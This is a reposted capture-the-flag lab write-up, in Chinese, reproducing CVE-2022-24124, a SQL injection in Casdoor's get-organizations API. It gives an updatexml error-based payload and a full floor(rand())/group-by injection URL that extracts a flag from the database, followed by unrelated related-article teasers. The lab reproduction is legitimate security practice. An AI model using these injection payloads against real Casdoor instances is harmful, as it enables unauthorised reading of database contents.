【春秋云境】CVE-2022-24124复现

news2024/11/25 6:34:18

在这里插入图片描述

一直不明白updatexml到底要怎么注入
&field=updatexml(0,concat(0x7e,(version()),0x7e),0)
确实可以出来版本号
在这里插入图片描述
但是如果换成database()还是不行
在这里插入图片描述

最后还是靠了大佬

http://eci-2ze625l338u3rfrh3r36.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=(select 1 from (select count(*), concat((select concat(',',id,flag) from casdoor.flag limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/52462.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

只要让我戴上面具 , 我就会马上逃跑 ! 等下眼镜卡住了

只要让我戴上面具 , 我就会马上逃跑 ! 等下眼镜卡住了

郑重声明 : 本文不包含任何广告 , 不构成任何购买建议 , 我也强烈不建议购买本文这款产品 , 所有图片来自我手机拍照 , 如有侵权 , 通知我 , 马上删除 写在前面 相信各位同学一定都经历过火灾安全知识培训吧 而且肯定有一部分人是那种充当表演对象的上手使用过灭火器的人 除了…
阅读更多...
STM32实战总结:HAL之SDIO

STM32实战总结:HAL之SDIO

在介绍SDIO接口之前先了解一下MMC、SD卡、SD标准等背景知识。 MMC(Multi Media Card):即多媒体卡,它是一种非易失性存储器件,体积小巧,容量大,耗电量低,传输速度快,主要应用于消费类电子产品中&…
阅读更多...
D. Social Network(并查集修改连通块数量)

D. Social Network(并查集修改连通块数量)

Problem - D - Codeforces 威廉来到了一个专门讨论加密货币的会议。要想了解加密货币世界的最新消息,建立联系、认识新朋友、利用朋友的关系是必不可少的。 会议有N个参与者,他们最初都不熟悉对方。威廉可以把之前不熟悉的任何两个人a和b介绍给对方。 …
阅读更多...
spi驱动数码管

spi驱动数码管

spi是串行全双工同步通信,支持多从机模式,没有应答机制,可靠性方面存在劣势; 采用边沿采样,根据时钟极性和时钟相位,有四种数据传输方式(由时钟变化(极性,相位)决定; 因…
阅读更多...
Java Tomcat内存马——Listener内存马

Java Tomcat内存马——Listener内存马

目录 (一)前置知识 0x01 什么是Listener 0x02 Listener的简单案例 0x03 Listener流程分析 (二)注入分析 (三)实现内存马 得到完整的内存马 (四)漏洞复现 其他的payload: 总结 (一&#…
阅读更多...
Observability:从零开始创建 Java 微服务并监控它 (二)

Observability:从零开始创建 Java 微服务并监控它 (二)

这篇文章是继上一篇文章 “Observability:从零开始创建 Java 微服务并监控它 (一)” 的续篇。在上一篇文章中,我们讲述了如何创建一个 Java web 应用,并使用 Filebeat 来收集应用所生成的日志。在今天的文章中&#xf…
阅读更多...
机器学习3判断机器算法的性能

机器学习3判断机器算法的性能

文章目录一、判断机器算法的性能1基本使用1.目的2.使用pycharm函数封装3.sklearn中的train test split:4.完美调用:二、判断机器算法的性能2分类的准确度(accuracy)准确度初步计算:完善KNNpy程序如下:一、判…
阅读更多...
[附源码]Python计算机毕业设计Django高校社团管理系统

[附源码]Python计算机毕业设计Django高校社团管理系统

项目运行 环境配置: Pychram社区版 python3.7.7 Mysql5.7 HBuilderXlist pipNavicat11Djangonodejs。 项目技术: django python Vue 等等组成,B/S模式 pychram管理等等。 环境需要 1.运行环境:最好是python3.7.7,…
阅读更多...
GHost系统备份与还原

GHost系统备份与还原

前期准备工作:U盘(>8G),最好大一点,如果你U盘要放GHO或者ISO文件的话,可能就不够用了。 我这里使用的老白菜工具,然后制作一个启动U盘。附教程连接:http://laobaicai.bsllcmgs.cn/upqdzz.htm…
阅读更多...
无线通信系统简述(学习笔记)

无线通信系统简述(学习笔记)

文章目录Evolution of Mobile Radio CommunicationsFirst GenerationSecond GenerationThird GenerationFourth GenerationFifth GenerationOther Wireless Communication SystemsWireless Local Area Networks (WLAN)Satellite communication networkWireless Sens…
阅读更多...
揭秘如今市场上最火爆的三大商业模式,点进来看看有没有什么收获

揭秘如今市场上最火爆的三大商业模式,点进来看看有没有什么收获

大家好,我是爱生活爱分享,无限输出干活内容的阿璋,今天和大家分享一下现在最实用最流行的三大商业模式,现在市面上都有成熟的案例,每个模式都有不同的效果,大家可以看一看,学一学,借…
阅读更多...
高通导航器软件开发包使用指南(17)

高通导航器软件开发包使用指南(17)

高通导航器软件开发包使用指南(17)11 附加的功能11.1 螺旋桨障碍检测11.1.1 螺旋桨起转期间11.1.2 飞行中11.2 低电压警告和迫降11.3 GPS 模式下的 Geotether11.4 禁飞区功能11.5 不允许螺旋桨旋转的传感器检查11.6 仿真模式11.6.1 简介11.6.2 用法12 状…
阅读更多...
一种用于入侵检测的自适应集成机器学习模型

一种用于入侵检测的自适应集成机器学习模型

一种用于入侵检测的自适应集成机器学习模型学习目标学习内容一.Decision Tree Based Intrusion Detection System for NSL-KDD Dataset二、一种用于入侵检测的自适应集成机器学习模型D. Multi-Tree算法E. 深度神经网络(Deep Neural Networks)算法/多层感知机&#x…
阅读更多...
pikachu平台SQL注入

pikachu平台SQL注入

pikachu平台SQL注入 日常心累、速通pikachu注入相关 目录pikachu平台SQL注入使用到的名词解释1. 数字型注入 --使用bp处理数据包2. 字符型注入 --hackbar处理3. 搜索型注入4. xx型注入5. insert/update注入6. delete注入7. http头注入8. 布尔盲注9. 时间盲注10. 宽字节注入使用…
阅读更多...
MYSQL 事务、事务隔离级别和MVCC,幻读

MYSQL 事务、事务隔离级别和MVCC,幻读

快照读和当前读 快照读:快照读就是读取的是快照数据,不加锁的普通 SELECT 都属于快照读。如下面语句: select * from table where ..... 当前读:当前读就是读的是最新数据,而不是历史的数据,加锁的 SELECT&#xff0c…
阅读更多...
八、Nacos服务注册和配置中心

八、Nacos服务注册和配置中心

SpringCloud Alibaba Nacos服务注册和配置中心 Nacos简介 为什么叫Nacos 前四个字母分别为Naming和Configuration的前两个字母,最后的s为Service 是什么 一个更易于构建云原生应用的动态服务发现,配置管理和服务管理中心 Nacos:Dynamic…
阅读更多...
微信

微信

引言:微信必不可少,但用着用着 C 盘内存飙升,不知如何解决?这篇博文来帮你 文章目录一、安装微信二、微信文件默认保存位置的更改三、WeChat Files 有什么?一、安装微信 下载之前先在 D 盘(除了 C 盘就行&…
阅读更多...
Android Profiler入门与实践

Android Profiler入门与实践

1、内存分析 点击MEMORY,可以看到正在运行进程的各种内存使用情况 Tips:点击右上角的垃圾桶图标会触发强制gc 1.1、查看Java堆内存和Java实例 执行以下代码: 说明:list为MainActivity的全局变量,所以list的只有在M…
阅读更多...
数据结构和算法——基于Java——4.1栈(数组实现栈、链表实现栈)

数据结构和算法——基于Java——4.1栈(数组实现栈、链表实现栈)

理论补充 先进后出 FILO(First-Input-Last-Out)的有序列表,限制线性表中元素的插入和删除只能在线性表的同一端进行 栈顶:变化的一端栈底:固定的一端 代码实现 2.1 数组模拟栈 package com.b0.stack;import java.util.Scanner…
阅读更多...
[附源码]Python计算机毕业设计SSM考研信息共享博客系统(程序+LW)

[附源码]Python计算机毕业设计SSM考研信息共享博客系统(程序+LW)

项目运行 环境配置: Jdk1.8 Tomcat7.0 Mysql HBuilderX(Webstorm也行) Eclispe(IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持)。 项目技术: SSM mybatis Maven Vue 等等组成,B/S模式 M…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023